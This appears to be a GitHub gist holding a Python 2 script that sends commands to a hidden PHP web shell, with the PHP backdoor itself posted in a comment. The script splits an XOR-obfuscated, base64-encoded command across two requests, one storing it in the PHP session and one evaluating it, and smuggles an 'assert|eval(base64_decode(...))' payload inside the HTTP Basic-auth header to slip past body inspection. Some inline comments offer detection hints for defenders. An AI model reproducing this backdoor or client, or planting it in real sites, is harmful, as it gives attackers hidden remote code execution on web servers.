@enkomio
Created May 13, 2017 19:16
Script to interact with hidden web shell
import httplib2
import binascii
import os
import base64
import sys
# Usage guard: a target URL and a command string are required.
# NOTE: this file is Python 2 only (print statements here and below, xrange in
# xor_obfuscate, str-based base64); it will not run unmodified on Python 3.
if len(sys.argv) < 3:
    print "Usage: {0} <url> <command>".format(sys.argv[0])
    exit(1)
def generate_random_string(len):
    """Return ``2 * len`` lowercase hex characters drawn from ``os.urandom``.

    The parameter is named ``len`` and therefore shadows the builtin inside
    this function; the body deliberately never calls ``len(...)``.
    On Python 2 the result is a ``str``; on Python 3 ``hexlify`` would give ``bytes``.
    """
    raw_bytes = os.urandom(len)
    return binascii.hexlify(raw_bytes)
def xor_obfuscate(data, key):
    """XOR every character of ``data`` with the cycling characters of ``key``.

    The operation is its own inverse: applying it twice with the same key
    yields ``data`` again. An empty ``key`` with non-empty ``data`` raises
    ``ZeroDivisionError`` from ``pos % 0`` (same as the original loop).
    This is obfuscation, not encryption: a repeating-key XOR gives no
    confidentiality against anyone who can see the traffic or the key.
    """
    key_length = len(key)
    mixed = [chr(ord(ch) ^ ord(key[pos % key_length])) for pos, ch in enumerate(data)]
    return ''.join(mixed)
def send_request(url, data, session_cookie):
    """GET ``url`` carrying ``data`` as the password of an HTTP Basic credential.

    The Basic username is empty, so the server sees ``data`` in
    ``PHP_AUTH_PW``; ``session_cookie`` is sent verbatim as the ``Cookie``
    header. Returns the response body, or ``''`` on *any* exception: the bare
    ``except`` hides DNS/connection errors, TLS failures and bad responses
    alike, so a caller cannot tell "empty output" from "request failed".

    Review notes: certificate validation is switched off
    (``disable_ssl_certificate_validation=True``), so the connection can be
    intercepted; the User-Agent is a fixed browser string, so the UA alone is
    not a useful indicator -- the unusual Authorization header (empty
    username, '|'-separated password) is.
    """
    try:
        credential = base64.b64encode(":" + data)
        request_headers = {
            "User-agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36",
            "Authorization": 'Basic ' + credential,
            "Cookie": session_cookie,
        }
        client = httplib2.Http(disable_ssl_certificate_validation=True)
        _, body = client.request(url, 'GET', headers=request_headers)
    except:
        return ''
    return body
# global variables
# Per-run parameters. The PHPSESSID value is 26 random hex characters that the
# server never issued (the server presumably starts a new session for it), and
# the XOR key is random as well. The key is later embedded in clear in the PHP
# sent during step 2, so it is not a secret from the server or from anyone who
# can observe the traffic. Detection hint: a PHPSESSID that never appeared in a
# Set-Cookie from the server, combined with Basic auth, is the pattern to look for.
url = sys.argv[1]
php_command = sys.argv[2]
session_cookie = "PHPSESSID=" + generate_random_string(13)
shell_key = "shell"
encryption_key = generate_random_string(25)
print "[+] Using session value: " + session_cookie
print "[+] Encryption key: " + encryption_key
###########################################
# step 1 - implant shell in user session #
###########################################
# PHP that the server side evaluates: it opens the session and stores field 3
# of the '|'-split PHP_AUTH_PW under the key given in field 2, i.e. the
# XOR-obfuscated, base64-encoded command ends up in $_SESSION["shell"].
# Nothing is executed by this request; the command only sits in the session
# store until step 2 reads it back.
code_exec = """
session_start();
$a = explode("|", $_SERVER['PHP_AUTH_PW']);
$_SESSION[$a[2]] = $a[3];
"""
# Obfuscate, then base64 so the blob cannot contain the '|' separator.
encrypted_php_command = xor_obfuscate(php_command, encryption_key)
code_install_shell = shell_key + "|" + base64.b64encode(encrypted_php_command)
# Field 0 = function name ("assert"), field 1 = its argument (the base64 stage,
# decoded and eval'd), fields 2-3 = session key and value. For defenders: the
# literal "assert|eval(base64_decode(" travels inside the Authorization header,
# not the request body, so body-only inspection misses it entirely.
data = "assert|eval(base64_decode('{0}').';return True;')|{1}".format(base64.b64encode(code_exec), code_install_shell)
# Return value is ignored, and send_request returns '' on any failure, so a
# failed install is silent here.
send_request(url, data, session_cookie)
print "[+] Installed command in user session"
###########################################
# step 2 - invoke shell stored in session #
###########################################
# Second request, same PHPSESSID cookie: the PHP reopens the session, checks
# that $_SESSION["shell"] exists, base64-decodes it, undoes the XOR with the
# key that is formatted into the code in clear, and eval()s the result.
# Because the command is split across two requests (stored blob in one, key in
# the other), no single request carries the runnable command in clear; the
# request *sequence* and the session-store contents are what reveal it.
# Doubled braces are str.format escapes, i.e. literal PHP braces.
code_exec = ("""
session_start();
if (array_key_exists("{0}", $_SESSION))
{{
function xor_deobf($str, $key)
{{
$out = '';
for($i = 0; $i < strlen($str); ++$i)
$out .= ($str[$i] ^ $key[$i % strlen($key)]);
return $out;
}}
eval(xor_deobf(base64_decode($_SESSION["{0}"]), "{1}"));
}}
""").format(shell_key, encryption_key)
# Same "assert|eval(base64_decode(...))" envelope as step 1, without the
# extra session fields.
data = "assert|eval(base64_decode('{0}').';return True;')".format(base64.b64encode(code_exec))
# Whatever the server emits (presumably the command's output) is the response
# body. An empty result is ambiguous: send_request also returns '' when the
# request itself failed.
print "[+] Result: " + send_request(url, data, session_cookie=session_cookie)
enkomio commented May 13, 2017

It is supposed to interact with the following PHP script:

<?php
// Minimal backdoor: when the request carries HTTP Basic credentials, the
// *password* is split on '|' and the function named by field 0 is called with
// field 1 as its only argument (a PHP variable function call). The leading '@'
// suppresses error output, so a failed call leaves no trace in the response.
// There is no check of who the caller is; any client that sends Basic auth
// can drive it.
// Defenders: flag files where $_SERVER['PHP_AUTH_PW'] feeds explode() and a
// variable function call ($a[0](...)), and Basic-auth requests whose password
// holds '|'-separated function names such as assert or eval.
if (isset($_SERVER['PHP_AUTH_PW'])) 
{
	$a = explode("|", $_SERVER['PHP_AUTH_PW']);	
	@$a[0]($a[1]);
}
?>
